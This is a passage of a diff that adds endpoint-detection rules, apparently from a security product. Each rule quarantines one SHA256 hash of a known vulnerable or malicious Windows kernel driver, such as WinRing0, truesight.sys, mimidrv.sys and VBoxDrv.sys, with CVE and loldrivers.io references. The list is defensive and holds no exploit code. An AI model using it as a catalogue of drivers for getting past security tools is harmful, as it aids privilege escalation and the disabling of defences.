+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a2b70bc-1678-570f-9173-747a031380e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983122Z",
+ "creation_date": "2026-03-23T11:45:29.983124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1ee0b8a7974f3d11c10241027c0e7171c798a28589aae9ff8c5a86228642af7",
+ "comment": "Malicious Kernel Driver (aka wantd_3.sys) [https://www.loldrivers.io/drivers/a22104a8-126d-449f-ba3e-28678c60c587/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a2bbcd1-73a6-576f-870e-74b7f61b09e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455816Z",
+ "creation_date": "2026-03-23T11:45:30.455820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80b2c44b2cdb74bafcc1271c5338f1d80f3621308b6c9d24d52bb28c8983677c",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3a32b8-a832-597a-82ae-ed3eef3f84d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982253Z",
+ "creation_date": "2026-03-23T11:45:29.982255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7047cee090ddbd150d7337a9357e03ccea56f004a2d29ddb7b8a0636a396240",
+ "comment": "Vulnerable Kernel Driver (aka KfeCo11X64.sys) [https://www.loldrivers.io/drivers/76b5dfae-b384-45ce-8646-b2eec6b76a1e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3ca41e-25b6-565d-ac7e-04d0b3483ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146865Z",
+ "creation_date": "2026-03-23T11:45:31.146867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146884Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abd10f102691ac30182a9ad827348cd480512a7f56fdbd9e450a8aaae2c837de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3ce5ab-06e8-5c07-9740-330dad25c761",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149222Z",
+ "creation_date": "2026-03-23T11:45:31.149224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "128c06b72d6dc977f4bb042ea1899be9ee0e8444f23bb87be606551c01e5adf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a52585c-37ca-5252-af03-8302756c1a01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608596Z",
+ "creation_date": "2026-03-23T11:45:29.608598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4c6063550ccae04771484b5eb60b5be33d07cebfbc3caa47e5f369f9fb50fc7",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a5b8176-be27-5e53-9748-b0c93fc82ee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463212Z",
+ "creation_date": "2026-03-23T11:45:30.463215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a5efa77-642e-5361-bd59-9092809ab5a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622949Z",
+ "creation_date": "2026-03-23T11:45:29.622951Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622957Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6753d2e6cf2f11932b4fedd4362ab57651f8f3baa886eace22fd98a14ebc2e8",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a624cf2-d115-5acb-a507-21ae38161cbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489827Z",
+ "creation_date": "2026-03-23T11:45:31.489830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2de8a42b61fcc910baaef045c02e34d5734c17362c4c9c59ebe31b09dca9501a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a64bf39-4827-5a24-a236-e7ef77383d92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978562Z",
+ "creation_date": "2026-03-23T11:45:29.978564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41",
+ "comment": "Vulnerable Kernel Driver (aka IOMap64.sys) [https://www.loldrivers.io/drivers/f4990bdd-8821-4a3c-a11a-4651e645810c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a668372-1b9e-5fea-9a7c-30facbfed65f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817004Z",
+ "creation_date": "2026-03-23T11:45:31.817006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "871699ac3fb68074ce6311aa3c73427f18c314c9e9d2591314479fd171b5de04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a767f35-e879-541d-8dd1-ef6684b7e619",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822891Z",
+ "creation_date": "2026-03-23T11:45:31.822894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f3726da10f29b45473ea00b336648ce38b375a107f212e8d61a93d7140301e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a7820ad-fbc1-5acb-8688-265b7c6a4835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608033Z",
+ "creation_date": "2026-03-23T11:45:29.608035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8eb26b6f79020ae988e4fb752dc06e1b6779749bf4f8df2872fc2b92bab8020",
+ "comment": "Vulnerable Kernel Driver (aka tfbfs3ped.sys) [https://www.loldrivers.io/drivers/500e07cb-77c6-4e83-ae3f-73f70f1c10b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a78f9a1-58ad-5bb3-b213-06fc39e4246e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486638Z",
+ "creation_date": "2026-03-23T11:45:31.486642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3df955b65cf8868501e7584ea4c444c8ec848c338bf1ce0174f7284f82b2e458",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a7933cd-ecfb-51ad-93e2-4913d3fc1da8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455417Z",
+ "creation_date": "2026-03-23T11:45:30.455420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bf84bed9b5fa4576182c84d2f31679dc472acd0f83c9813498e9f71ed9fef3e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.sys) [https://www.loldrivers.io/drivers/181b89e5-4bdd-4e95-b1bc-a294a4adfb29/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a8a6c3d-eeaf-5567-bfa6-d648744181b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453041Z",
+ "creation_date": "2026-03-23T11:45:30.453045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c08581e3e444849729c5b956d0d6030080553d0bc6e5ae7e9a348d45617b9746",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a8e0509-4ee8-5f29-9618-7fb09c152d7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475601Z",
+ "creation_date": "2026-03-23T11:45:31.475605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475615Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "027e22a238d1033467ec4800479392e27f4e5fd4a50785f96a32722d15df5acf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a91b4bb-e231-5476-b96e-68d0e2a130b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478833Z",
+ "creation_date": "2026-03-23T11:45:31.478837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4060fe83f89ef7c94f52a20dbbcb8e6303cb9f493d622b7785763612f9d17e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ab7195c-97f4-5a9d-8fe8-abb26d1aacf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828275Z",
+ "creation_date": "2026-03-23T11:45:30.828277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d4da5704e1c198d6925473d42c11932485dfcb60d59dbfdd2f9459e3589286f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ab8f1a7-8ef9-5fb6-82c6-6ee89df0ba1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483147Z",
+ "creation_date": "2026-03-23T11:45:31.483151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4216ccb7c3d275f6ca2e093ccfc50b8e4e76709d80ed723eb2d9d64aa0e90d87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1abd5bc8-7649-5b4d-abf2-2717cf6ef1ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466664Z",
+ "creation_date": "2026-03-23T11:45:30.466667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ac73fb4-7e4c-5f43-8dd8-24341e7d9502",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819428Z",
+ "creation_date": "2026-03-23T11:45:30.819430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d54ac69c438ba77cde88c6efd6a423491996d4e8a235666644b1db954eb1da9c",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ac96720-2eeb-59e3-8927-f2904b1369f9",
+ "test_maturity_current_count": 0,
